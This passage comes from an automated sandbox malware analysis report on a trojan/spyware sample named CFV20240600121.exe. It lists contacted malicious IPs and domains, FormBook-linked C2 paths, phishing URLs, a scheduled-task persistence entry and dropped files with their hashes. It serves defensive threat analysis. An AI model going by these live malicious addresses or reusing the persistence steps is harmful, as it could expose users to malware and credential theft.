                                      http://www.witoharmuth.de/wp-content/themes/hestia/assets/css/font-sizes.min.css?ver=3.0.21write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jswrite.exe, 00000015.00000002.4525142132.00000000065D6000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003CD6000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.west.cn/jiaoyi/write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.witoharmuth.de/wp-content/plugins/quiz-maker/public/css/quiz-maker-public.css?ver=6.3.3.0write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://zijrmf.com/registerwrite.exe, 00000015.00000002.4525142132.0000000006120000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003820000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://www.witoharmuth.de/portfolio/write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.witoharmuth.de/blog/RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.witoharmuth.de/projekt-details/RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      102.222.124.13
                                      		www.duzane.comunknown
                                      		36926CKL1-ASNKEtrue
                                      162.0.213.72
                                      		www.chowzen.topCanada
                                      		35893ACPCAtrue
                                      172.67.160.38
                                      		www.lunareafurniture.comUnited States
                                      		13335CLOUDFLARENETUStrue
                                      3.64.163.50
                                      		www.webuyfontana.comUnited States
                                      		16509AMAZON-02UStrue
                                      116.213.43.190
                                      		www.binpvae.lolHong Kong
                                      		63889CLOUDIVLIMITED-ASCloudIvLimitedHKtrue
                                      176.113.70.180
                                      		www.ie8mce.websiteUnited Kingdom
                                      		209484ASIANETGBtrue
                                      85.13.162.190
                                      		www.witoharmuth.comGermany
                                      		34788NMM-ASD-02742FriedersdorfHauptstrasse68DEtrue
                                      101.36.121.143
                                      		www.shrongcen.comChina
                                      		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKtrue
                                      217.116.0.191
                                      		www.lecoinsa.netSpain
                                      		16371ACENS_ASSpainHostinghousingandVPNservicesEStrue
                                      103.120.80.111
                                      		www.zhuan-tou.comHong Kong
                                      		139021WEST263GO-HKWest263InternationalLimitedHKtrue
                                      34.149.87.45
                                      		td-ccm-neg-87-45.wixdns.netUnited States
                                      		2686ATGS-MMD-ASUStrue
                                      64.226.69.42
                                      		www.kacotae.comCanada
                                      		13768COGECO-PEER1CAtrue
                                      103.138.88.32
                                      		skyinftech.comViet Nam
                                      		45538ODS-AS-VNOnlinedataservicesVNtrue
                                      35.241.34.216
                                      		www.mg55aa.xyzUnited States
                                      		15169GOOGLEUSfalse

                                      General Information

                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1454436
                                      Start date and time:2024-06-10 10:19:08 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 12m 1s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:24
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:2
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:CFV20240600121.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@31/16@16/14
                                      EGA Information:
                                      • Successful, ratio: 80%
                                      HCA Information:
                                      • Successful, ratio: 93%
                                      • Number of executed functions: 200
                                      • Number of non-executed functions: 289
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      04:20:02API Interceptor2x Sleep call for process: CFV20240600121.exe modified
                                      04:20:04API Interceptor56x Sleep call for process: powershell.exe modified
                                      04:20:09API Interceptor2x Sleep call for process: BPSHhDGmARC.exe modified
                                      04:21:10API Interceptor10907428x Sleep call for process: write.exe modified
                                      10:20:06Task SchedulerRun new task: BPSHhDGmARC path: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      102.222.124.131PTLWkB6Xv.imgGet hashmaliciousFormBookBrowse
                                      • www.duzane.com/6tsi/
                                      nr 133764ZMA2024.exeGet hashmaliciousFormBookBrowse
                                      • www.duzane.com/6tsi/
                                      PO 053124.exeGet hashmaliciousFormBookBrowse
                                      • www.retailscapital.co.za/qxnn/
                                      bin.exeGet hashmaliciousFormBookBrowse
                                      • www.retailscapital.co.za/h6lx/
                                      162.0.213.72IMG__001.exeGet hashmaliciousFormBookBrowse
                                      • www.beescy.xyz/pdwc/
                                      lrShdpqqbi.rtfGet hashmaliciousFormBookBrowse
                                      • www.beescy.xyz/pdwc/
                                      pFvpxWS2lD.exeGet hashmaliciousFormBookBrowse
                                      • www.beescy.xyz/pdwc/
                                      rShippingDocuments.exeGet hashmaliciousFormBookBrowse
                                      • www.beescy.xyz/pdwc/
                                      3.64.163.50Brudstyrken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.insist.site/8cwt/
                                      fJuwM4Bwi7.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.insist.site/8cwt/
                                      02062024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.afelon.vote/oe02/
                                      anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.insist.site/8cwt/
                                      po8909893299832.exeGet hashmaliciousFormBookBrowse
                                      • www.blogonrunning.com/hd05/?mJBXxJ=L307NeH5fWkLgKK43su7TNgrL3oq/VFX5jHnogZ3Xy90kbIeezXbjunmo4QVhDvcCpqA&_hrl=jxopsZ
                                      Mekanikken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.mindfreak.live/udud/
                                      PO JAN 2024.exeGet hashmaliciousFormBookBrowse
                                      • www.hitbass.com/uonn/
                                      Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.mindfreak.live/udud/
                                      Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.insist.site/8cwt/
                                      Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.mindfreak.live/udud/

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      www.duzane.com1PTLWkB6Xv.imgGet hashmaliciousFormBookBrowse
                                      • 102.222.124.13
                                      nr 133764ZMA2024.exeGet hashmaliciousFormBookBrowse
                                      • 102.222.124.13
                                      td-ccm-neg-87-45.wixdns.netPR-ZWL 07364G49574(Revised PO).exeGet hashmaliciousFormBookBrowse
                                      • 34.149.87.45
                                      http://hfjh612.wixsite.com/my-site-1Get hashmaliciousUnknownBrowse
                                      • 34.149.87.45
                                      DRAFT 99577590.exeGet hashmaliciousFormBookBrowse
                                      • 34.149.87.45
                                      Purchase order.pdf.exeGet hashmaliciousFormBookBrowse
                                      • 34.149.87.45
                                      invoice.exeGet hashmaliciousFormBookBrowse
                                      • 34.149.87.45
                                      Maersk Arrival Notice ready for Bill of Lading 238591458.exeGet hashmaliciousFormBookBrowse
                                      • 34.149.87.45
                                      1PTLWkB6Xv.imgGet hashmaliciousFormBookBrowse
                                      • 34.149.87.45
                                      nr 133764ZMA2024.exeGet hashmaliciousFormBookBrowse
                                      • 34.149.87.45
                                      R00634789001126789_PDF0863.exeGet hashmaliciousFormBookBrowse
                                      • 34.149.87.45
                                      staff record or employee record.exeGet hashmaliciousFormBookBrowse
                                      • 34.149.87.45
                                      www.am1-728585.com1PTLWkB6Xv.imgGet hashmaliciousFormBookBrowse
                                      • 117.50.32.166
                                      nr 133764ZMA2024.exeGet hashmaliciousFormBookBrowse
                                      • 117.50.32.166
                                      www.shrongcen.com1PTLWkB6Xv.imgGet hashmaliciousFormBookBrowse
                                      • 117.50.32.166
                                      www.binpvae.lolnr 133764ZMA2024.exeGet hashmaliciousFormBookBrowse
                                      • 116.213.43.190
                                      www.ie8mce.website1PTLWkB6Xv.imgGet hashmaliciousFormBookBrowse
                                      • 176.113.70.180
                                      www.witoharmuth.com1PTLWkB6Xv.imgGet hashmaliciousFormBookBrowse
                                      • 85.13.162.190
                                      nr 133764ZMA2024.exeGet hashmaliciousFormBookBrowse
                                      • 85.13.162.190

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUShttps://circleoftoast.blogspot.comGet hashmaliciousUnknownBrowse
                                      • 104.18.11.207
                                      https://pv2373-s51s.combichem.cyou/Get hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      https://googleweblight.com/i?u=https://hizoom.co.uk/wp-admin/js/hereme/46343/8473r/YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=&domain=iledefrance.frGet hashmaliciousHTMLPhisherBrowse
                                      • 104.19.166.65
                                      https://singlelogin.reGet hashmaliciousUnknownBrowse
                                      • 104.21.63.175
                                      https://hizoom.co.uk/wp-admin/js/hereme/46343/8473r/YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=Get hashmaliciousHTMLPhisherBrowse
                                      • 104.19.166.65
                                      https://nznl.wermlandskott.se/ttr/rot0609UKuf5bcaifqyscQRe2vcDb24/f_oynfg-qvfgevohgvba.bet/Get hashmaliciousUnknownBrowse
                                      • 172.64.150.248
                                      kfP3Y1Y2Ug.rtfGet hashmaliciousLokibotBrowse
                                      • 188.114.96.3
                                      https://files.emailmeform.com/2315466/b9URkx7C/aaadowundsouthfbfj.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 104.17.231.29
                                      https://shorturl.at/c9o0aGet hashmaliciousUnknownBrowse
                                      • 104.16.183.87
                                      Mahsulot kodi va buyurtma miqdori.docx.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.13.205
                                      ACPCAkLvAyodXfb.elfGet hashmaliciousMiraiBrowse
                                      • 162.8.38.22
                                      http://vccs.workGet hashmaliciousUnknownBrowse
                                      • 162.0.217.157
                                      SecuriteInfo.com.Win32.PWSX-gen.26916.23346.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 162.0.217.91
                                      http://norauto-dreux.myfreesites.netGet hashmaliciousUnknownBrowse
                                      • 162.55.120.196
                                      IMG__001.exeGet hashmaliciousFormBookBrowse
                                      • 162.0.213.72
                                      Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                      • 162.0.213.94
                                      Maersk Arrival Notice ready for Bill of Lading 238591458.exeGet hashmaliciousFormBookBrowse
                                      • 162.0.217.38
                                      lrShdpqqbi.rtfGet hashmaliciousFormBookBrowse
                                      • 162.0.213.72
                                      P1 HWT623ATG.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 162.0.213.94
                                      pFvpxWS2lD.exeGet hashmaliciousFormBookBrowse
                                      • 162.0.213.72
                                      AMAZON-02UShttps://circleoftoast.blogspot.comGet hashmaliciousUnknownBrowse
                                      • 65.9.66.122
                                      https://hizoom.co.uk/wp-admin/js/hereme/46343/8473r/YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=Get hashmaliciousHTMLPhisherBrowse
                                      • 18.239.36.8
                                      https://nznl.wermlandskott.se/ttr/rot0609UKuf5bcaifqyscQRe2vcDb24/f_oynfg-qvfgevohgvba.bet/Get hashmaliciousUnknownBrowse
                                      • 3.75.2.73
                                      https://shorturl.at/c9o0aGet hashmaliciousUnknownBrowse
                                      • 34.241.202.139
                                      Q08dqv9CHC.elfGet hashmaliciousMiraiBrowse
                                      • 44.237.5.254
                                      https://flow.page/pagdrivexGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                      • 13.32.99.107
                                      h.x86-20240610-0050.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 54.253.84.59
                                      https://whatsapp.styyyuxp.shop/Get hashmaliciousUnknownBrowse
                                      • 143.204.207.250
                                      https://sbni-bmrm.vercel.app/Get hashmaliciousUnknownBrowse
                                      • 76.76.21.241
                                      https://ggzklqy22.njkirkorpwko86.dns-dynamic.net/Get hashmaliciousUnknownBrowse
                                      • 18.239.85.223
                                      CKL1-ASNKEbVMuPnsMIq.elfGet hashmaliciousMiraiBrowse
                                      • 102.216.78.13
                                      YfM6hAPQaS.elfGet hashmaliciousMiraiBrowse
                                      • 102.236.129.73
                                      9W8C6mXhAB.elfGet hashmaliciousMiraiBrowse
                                      • 102.234.115.160
                                      TGYj8HxqY9.elfGet hashmaliciousMiraiBrowse
                                      • 102.233.125.207
                                      3CMCBTr1Bk.elfGet hashmaliciousMiraiBrowse
                                      • 102.192.150.166
                                      y67Clq4bQY.elfGet hashmaliciousMiraiBrowse
                                      • 102.196.39.141
                                      ycWb26lVAe.elfGet hashmaliciousMiraiBrowse
                                      • 102.235.123.13
                                      vg664Y4air.elfGet hashmaliciousMiraiBrowse
                                      • 102.219.147.128
                                      06V2RO89xu.elfGet hashmaliciousMiraiBrowse
                                      • 102.196.145.28
                                      VapIQOTGj7.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                      • 102.208.249.60

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BPSHhDGmARC.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CFV20240600121.exe.log

                                      Download File
                                      Process:C:\Users\user\Desktop\CFV20240600121.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:true
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):2232
                                      Entropy (8bit):5.379460230152629
                                      Encrypted:false
                                      SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
                                      MD5:4DC84D28CF28EAE82806A5390E5721C8
                                      SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
                                      SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
                                      SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
                                      Malicious:false
                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                      C:\Users\user\AppData\Local\Temp\_R39449

                                      Download File
                                      Process:C:\Windows\SysWOW64\write.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.121297215059106
                                      Encrypted:false
                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bqupflm.gik.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lojudk4.vpy.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yjutjpn.auw.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esnnzkce.4bd.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdc31xn2.1zd.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvrb1awk.wbr.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_losuqnbf.1iv.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
